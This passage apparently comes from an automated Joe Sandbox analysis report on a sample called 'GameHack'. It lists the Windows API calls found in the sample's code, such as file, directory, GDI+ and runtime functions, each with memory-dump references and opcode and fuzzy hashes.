                                      • GetLastError.KERNEL32(?,00EFA49B,00EDCFE0,00000000,00000000,00000000,?,00EFA698,00000006,FlsSetValue,00F07348,00F07350,00000000,00000364,?,00EF9077), ref: 00EFA532
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00EFA49B,00EDCFE0,00000000,00000000,00000000,?,00EFA698,00000006,FlsSetValue,00F07348,00F07350,00000000), ref: 00EFA540
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: e4e12ba9deb70722f4fac2d4e81efbf36ff8552be4904c2c3ca3328854d67c93
                                      • Instruction ID: 4c8864e6e4c7f2517466fb81ae76cc1559c4f6552b621d91f06dc4bc0b321559
                                      • Opcode Fuzzy Hash: e4e12ba9deb70722f4fac2d4e81efbf36ff8552be4904c2c3ca3328854d67c93
                                      • Instruction Fuzzy Hash: 050147B261122EABC7208B689C44AB67B5CBF05BA5B280134FE0EEB240D720D900C6E1
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00EDCC94,00000001,?,?,?,00000000,00EE4ECD,?,?,?), ref: 00ED9F4C
                                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00EE4ECD,?,?,?,?,?,00EE4972,?), ref: 00ED9F8E
                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00EDCC94,00000001,?,?), ref: 00ED9FB8
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: FileWrite$Handle
                                      • String ID:
                                      • API String ID: 4209713984-0
                                      • Opcode ID: f782b4fa181bc8f9f30aceec79014fa70d6cd4cb18ef403e2abf3c2c858fabdf
                                      • Instruction ID: a0063e2c88f1dc1bd29c52d6a6897d9fe54f36e444d76f240903542a73065aab
                                      • Opcode Fuzzy Hash: f782b4fa181bc8f9f30aceec79014fa70d6cd4cb18ef403e2abf3c2c858fabdf
                                      • Instruction Fuzzy Hash: B131E2712083059BDF109F24DC48B7ABBA8FB50714F04566EF945AB382C775DD4ACBA2
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00EDA113,?,00000001,00000000,?,?), ref: 00EDA22E
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00EDA113,?,00000001,00000000,?,?), ref: 00EDA261
                                      • GetLastError.KERNEL32(?,?,?,?,00EDA113,?,00000001,00000000,?,?), ref: 00EDA27E
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$ErrorLast
                                      • String ID:
                                      • API String ID: 2485089472-0
                                      • Opcode ID: d677bdf461f40d22e3aa2680b6a4a76fffca0516505f89fc9a71638f00cbd846
                                      • Instruction ID: 0cb1e3a8b6131d4a5f9b325c2797e217cbb23c37d240e3406e9bf1b15ddcc3a3
                                      • Opcode Fuzzy Hash: d677bdf461f40d22e3aa2680b6a4a76fffca0516505f89fc9a71638f00cbd846
                                      • Instruction Fuzzy Hash: 4D01843118111865DB319B664C05BFA338CEF06755F0C5867F801F5261D755CB439663
                                      APIs
                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00EFB019
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Info
                                      • String ID:
                                      • API String ID: 1807457897-3916222277
                                      • Opcode ID: e5621a1b09a50fcea492b85f8a9b94e9c31f067e1f613195ab06c1f515b24485
                                      • Instruction ID: 73cfb2a907d68cffd8f048527af95c412483ca536a3586101c9d565ea883a2bf
                                      • Opcode Fuzzy Hash: e5621a1b09a50fcea492b85f8a9b94e9c31f067e1f613195ab06c1f515b24485
                                      • Instruction Fuzzy Hash: 7741197050438C9ADF218E24CC94BF7BBADEB45308F2414EDE69A97142D7359E45DF60
                                      APIs
                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00EFA79D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: String
                                      • String ID: LCMapStringEx
                                      • API String ID: 2568140703-3893581201
                                      • Opcode ID: 7fbcb891a56737305be89bbc819277336d20f4bb103702de587f5bc0420e90ee
                                      • Instruction ID: 975afe7d8df2888e9ecfb146e185a8a3971fdd9b3d3460d65420d95e11deec68
                                      • Opcode Fuzzy Hash: 7fbcb891a56737305be89bbc819277336d20f4bb103702de587f5bc0420e90ee
                                      • Instruction Fuzzy Hash: DE01C27254421DBBCF126FA0DC05DAE7FA6EB08750F045165FE186A1A0CA729A21FB92
                                      APIs
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00EF9D2F), ref: 00EFA715
                                      Strings
                                      • InitializeCriticalSectionEx, xrefs: 00EFA6E5
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CountCriticalInitializeSectionSpin
                                      • String ID: InitializeCriticalSectionEx
                                      • API String ID: 2593887523-3084827643
                                      • Opcode ID: dc9f93257749c8c3cc6b29b57d399ffc25b705333b33975ce983a524c2bcd699
                                      • Instruction ID: 151b6deb7ea34d9cf5fbdc64c29183ddb73e3493f48b653816fa08a0f82a8085
                                      • Opcode Fuzzy Hash: dc9f93257749c8c3cc6b29b57d399ffc25b705333b33975ce983a524c2bcd699
                                      • Instruction Fuzzy Hash: 51F0E271A4521CBBCB117F60DC05CAE7FA5FF48720B049065FD092A2A0DA729E10FBA2
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Alloc
                                      • String ID: FlsAlloc
                                      • API String ID: 2773662609-671089009
                                      • Opcode ID: f09a43f87be499589dec3ab23973f8544b333d1e9e64659b125c11348a12e333
                                      • Instruction ID: 03baae60bf334c14173701e6e23319bdec45d880e0ae0743a9aced14334c9fce
                                      • Opcode Fuzzy Hash: f09a43f87be499589dec3ab23973f8544b333d1e9e64659b125c11348a12e333
                                      • Instruction Fuzzy Hash: 77E0E5B0B4532C6BD2147B649C069BEBB94EB15B10B450165FD0D6B280DD719E00B6D6
                                      APIs
                                      • try_get_function.LIBVCRUNTIME ref: 00EF32AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: try_get_function
                                      • String ID: FlsAlloc
                                      • API String ID: 2742660187-671089009
                                      • Opcode ID: 8df54c64459f000dfc7164a33a70973dadead71e5b68d746dce27dbae422ab8e
                                      • Instruction ID: 7f4c494f44466f758e4a63ffaf9dc2ad062a52a3d6f24a6022ca349a6e437286
                                      • Opcode Fuzzy Hash: 8df54c64459f000dfc7164a33a70973dadead71e5b68d746dce27dbae422ab8e
                                      • Instruction Fuzzy Hash: C9D05B3178167D6AD51032D56C03ABFBE848701FF5F450252FF087E2D295E2C95075D6
                                      APIs
                                        • Part of subcall function 00EFAF1B: GetOEMCP.KERNEL32(00000000,?,?,00EFB1A5,?), ref: 00EFAF46
                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00EFB1EA,?,00000000), ref: 00EFB3C4
                                      • GetCPInfo.KERNEL32(00000000,00EFB1EA,?,?,?,00EFB1EA,?,00000000), ref: 00EFB3D7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CodeInfoPageValid
                                      • String ID:
                                      • API String ID: 546120528-0
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00EE2DA4
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00EE2DBC
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID:
                                      • API String ID: 2005118841-0
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED1385
                                        • Part of subcall function 00ED6057: __EH_prolog.LIBCMT ref: 00ED605C
                                        • Part of subcall function 00EDC827: __EH_prolog.LIBCMT ref: 00EDC82C
                                        • Part of subcall function 00EDC827: new.LIBCMT ref: 00EDC86F
                                        • Part of subcall function 00EDC827: new.LIBCMT ref: 00EDC893
                                      • new.LIBCMT ref: 00ED13FE
                                        • Part of subcall function 00EDB07D: __EH_prolog.LIBCMT ref: 00EDB082
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED1385
                                        • Part of subcall function 00ED6057: __EH_prolog.LIBCMT ref: 00ED605C
                                        • Part of subcall function 00EDC827: __EH_prolog.LIBCMT ref: 00EDC82C
                                        • Part of subcall function 00EDC827: new.LIBCMT ref: 00EDC86F
                                        • Part of subcall function 00EDC827: new.LIBCMT ref: 00EDC893
                                      • new.LIBCMT ref: 00ED13FE
                                        • Part of subcall function 00EDB07D: __EH_prolog.LIBCMT ref: 00EDB082
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      APIs
                                        • Part of subcall function 00EF8FA5: GetLastError.KERNEL32(?,00F10EE8,00EF3E14,00F10EE8,?,?,00EF3713,00000050,?,00F10EE8,00000200), ref: 00EF8FA9
                                        • Part of subcall function 00EF8FA5: _free.LIBCMT ref: 00EF8FDC
                                        • Part of subcall function 00EF8FA5: SetLastError.KERNEL32(00000000,?,00F10EE8,00000200), ref: 00EF901D
                                        • Part of subcall function 00EF8FA5: _abort.LIBCMT ref: 00EF9023
                                        • Part of subcall function 00EFB2AE: _abort.LIBCMT ref: 00EFB2E0
                                        • Part of subcall function 00EFB2AE: _free.LIBCMT ref: 00EFB314
                                        • Part of subcall function 00EFAF1B: GetOEMCP.KERNEL32(00000000,?,?,00EFB1A5,?), ref: 00EFAF46
                                      • _free.LIBCMT ref: 00EFB200
                                      • _free.LIBCMT ref: 00EFB236
                                      Similarity
                                      • API ID: _free$ErrorLast_abort
                                      • String ID:
                                      • API String ID: 2991157371-0
                                      APIs
                                      • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00ED9EDC,?,?,00ED7867), ref: 00ED97A6
                                      • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00ED9EDC,?,?,00ED7867), ref: 00ED97DB
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      APIs
                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00ED7547,?,?,?,?), ref: 00ED9D7C
                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00ED9E2C
                                      Similarity
                                      • API ID: File$BuffersFlushTime
                                      • String ID:
                                      • API String ID: 1392018926-0
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,00F03958), ref: 00EFA4B8
                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00EFA4C5
                                      Similarity
                                      • API ID: AddressProc__crt_fast_encode_pointer
                                      • String ID:
                                      • API String ID: 2279764990-0
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00ED9B35,?,?,00000000,?,?,00ED8D9C,?), ref: 00ED9BC0
                                      • GetLastError.KERNEL32 ref: 00ED9BCD
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00ED9E76
                                      • GetLastError.KERNEL32 ref: 00ED9E82
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      APIs
                                      • _free.LIBCMT ref: 00EF8627
                                        • Part of subcall function 00EF8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EFC13D,00000000,?,00EF67E2,?,00000008,?,00EF89AD,?,?,?), ref: 00EF854A
                                      • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00F10F50,00EDCE57,?,?,?,?,?,?), ref: 00EF8663
                                      Similarity
                                      • API ID: Heap$AllocAllocate_free
                                      • String ID:
                                      • API String ID: 2447670028-0
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?), ref: 00EE0915
                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 00EE091C
                                      Similarity
                                      • API ID: Process$AffinityCurrentMask
                                      • String ID:
                                      • API String ID: 1231390398-0
                                      APIs
                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00EDA27A,?,?,?,00EDA113,?,00000001,00000000,?,?), ref: 00EDA458
                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00EDA27A,?,?,?,00EDA113,?,00000001,00000000,?,?), ref: 00EDA489
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      APIs
                                      Similarity
                                      • API ID: ItemText_swprintf
                                      • String ID:
                                      • API String ID: 3011073432-0
                                      • Opcode ID: 53dee49320a1078c090962e607654f483e11167c402698c32123ab0657407618
                                      • Instruction ID: 682be06af4af3857ad4cff2e24d182372526c95983320243fc9bc6479deed988
                                      • Opcode Fuzzy Hash: 53dee49320a1078c090962e607654f483e11167c402698c32123ab0657407618
                                      • Instruction Fuzzy Hash: 8DF0EC7150438C7BEB11EB719C06FE9379DD704745F041556B600731A1DE716A615B62
                                      APIs
                                      • DeleteFileW.KERNELBASE(?,?,?,00ED984C,?,?,00ED9688,?,?,?,?,00F01FA1,000000FF), ref: 00EDA13E
                                      • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00ED984C,?,?,00ED9688,?,?,?,?,00F01FA1,000000FF), ref: 00EDA16C
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: DeleteFile
                                      • String ID:
                                      • API String ID: 4033686569-0
                                      • Opcode ID: fb0f1e8967dd2aff292fedc85b606b861d7a615f54aec1efcf15e14ae2af0bfd
                                      • Instruction ID: 2411633df085252dc702c934cefb81452505493a8ff449c8f5cc87890319aa45
                                      • Opcode Fuzzy Hash: fb0f1e8967dd2aff292fedc85b606b861d7a615f54aec1efcf15e14ae2af0bfd
                                      • Instruction Fuzzy Hash: F4E0927564220DABDB11AF60DC41FE9779CFB08385F485076B888E3260DB61DE95AA90
                                      APIs
                                      • GdiplusShutdown.GDIPLUS(?,?,?,?,00F01FA1,000000FF), ref: 00EEA3D1
                                      • CoUninitialize.COMBASE(?,?,?,?,00F01FA1,000000FF), ref: 00EEA3D6
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: GdiplusShutdownUninitialize
                                      • String ID:
                                      • API String ID: 3856339756-0
                                      • Opcode ID: 15c4f61ece680c72279903ac5fb2e0f612d0c45c117f8160d1bd0ae6027a59cb
                                      • Instruction ID: b3608e4a450a77d514acef19f955c4fab6feb21698a5b422ed150ee3c2c94215
                                      • Opcode Fuzzy Hash: 15c4f61ece680c72279903ac5fb2e0f612d0c45c117f8160d1bd0ae6027a59cb
                                      • Instruction Fuzzy Hash: E6F0ED32A08658EFC700EF4CDD01B09FBADFB88B20F00436AF409837A0CB34A800DA81
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00EDA189,?,00ED76B2,?,?,?,?), ref: 00EDA1A5
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00EDA189,?,00ED76B2,?,?,?,?), ref: 00EDA1D1
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: c32cd1aebafe45f04694a9abdea5209c2c155211e3c9aceb54dc69f0e376c866
                                      • Instruction ID: 37e02b0a71123b0b823dc9d79efd7538fbd5af6803a340dd5f58adebfc93bbf4
                                      • Opcode Fuzzy Hash: c32cd1aebafe45f04694a9abdea5209c2c155211e3c9aceb54dc69f0e376c866
                                      • Instruction Fuzzy Hash: DCE06D7550112C9BDF20AA689C05BD9B79CEB083A5F0452A2BD94E3290DA70DE459AE0
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EE00A0
                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00EDEB86,Crypt32.dll,00000000,00EDEC0A,?,?,00EDEBEC,?,?,?), ref: 00EE00C2
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystem
                                      • String ID:
                                      • API String ID: 1175261203-0
                                      • Opcode ID: 8197ac42ab50165d277bb602c0f5a025c5d550a50e338d1d0456c750e3a99985
                                      • Instruction ID: 1aa2444514ce06c0e434a96d0da356cd586458e00f7d1faa9f14668b0c8b739b
                                      • Opcode Fuzzy Hash: 8197ac42ab50165d277bb602c0f5a025c5d550a50e338d1d0456c750e3a99985
                                      • Instruction Fuzzy Hash: 94E0127690115CAADB219AA5AC05FD6B7ACFF09392F0404A6B948E3104DAB49A848BA0
                                      APIs
                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00EE9B30
                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00EE9B37
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: BitmapCreateFromGdipStream
                                      • String ID:
                                      • API String ID: 1918208029-0
                                      • Opcode ID: 4525f37c2b0ef976fdeb32fe9fc2c08976144d68254a88074e70bfd45274065f
                                      • Instruction ID: eb5f3fee7e84354eac9a2dc574e4a5a47359802485038ee2fe462d5a7185f2fe
                                      • Opcode Fuzzy Hash: 4525f37c2b0ef976fdeb32fe9fc2c08976144d68254a88074e70bfd45274065f
                                      • Instruction Fuzzy Hash: 96E0ED7190121CEBCB20DF99E501699B7E8EB08321F10905BE995A3311E6B16E04AB95
                                      APIs
                                        • Part of subcall function 00EF329A: try_get_function.LIBVCRUNTIME ref: 00EF32AF
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EF217A
